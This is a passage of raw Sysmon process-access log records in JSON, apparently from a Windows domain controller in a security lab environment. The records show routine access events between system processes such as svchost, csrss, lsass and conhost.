05:46:30.157","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","TargetProcessId":"1144","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":969,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:30.157\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nTargetProcessId: 1144\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:30.157","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","TargetProcessId":"1144","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":970,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:30.157\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nTargetProcessId: 1144\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:30.157","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","TargetProcessId":"1144","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":971,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:30.157\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nTargetProcessId: 1144\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:30.157","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","TargetProcessId":"1144","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":972,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:30.203\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {00000000-0000-0000-0000-000000000000}\r\nTargetProcessId: 2416\r\nTargetImage: C:\\Windows\\system32\\conhost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:30.203","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{00000000-0000-0000-0000-000000000000}","TargetProcessId":"2416","TargetImage":"C:\\Windows\\system32\\conhost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":973,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:30.266\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 992\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B6-5F25-0000-00101A7C0100}\r\nTargetProcessId: 2352\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:30.266","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"992","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B6-5F25-0000-00101A7C0100}","TargetProcessId":"2352","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":974,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:30.266\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 992\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B6-5F25-0000-00101A7C0100}\r\nTargetProcessId: 2352\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:30.266","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"992","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B6-5F25-0000-00101A7C0100}","TargetProcessId":"2352","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":975,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:30.313\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-00106E400100}\r\nSourceProcessId: 2172\r\nSourceThreadId: 2468\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-001034380100}\r\nTargetProcessId: 2096\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:30.313","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-00106E400100}","SourceProcessId":"2172","SourceThreadId":"2468","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-001034380100}","TargetProcessId":"2096","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":976,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:30.313\r\nSourceProcessGUID: {A837DB8D-01B6-5F25-0000-00108A6E0100}\r\nSourceProcessId: 2284\r\nSourceThreadId: 2460\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-01B6-5F25-0000-0010556D0100}\r\nTargetProcessId: 2276\r\nTargetImage: C:\\Windows\\system32\\compattelrunner.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:30.313","SourceProcessGUID":"{A837DB8D-01B6-5F25-0000-00108A6E0100}","SourceProcessId":"2284","SourceThreadId":"2460","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-01B6-5F25-0000-0010556D0100}","TargetProcessId":"2276","TargetImage":"C:\\Windows\\system32\\compattelrunner.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":977,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:30.313\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010DD410100}\r\nSourceProcessId: 2192\r\nSourceThreadId: 2464\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-00103D410100}\r\nTargetProcessId: 2180\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:30.313","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010DD410100}","SourceProcessId":"2192","SourceThreadId":"2464","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-00103D410100}","TargetProcessId":"2180","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
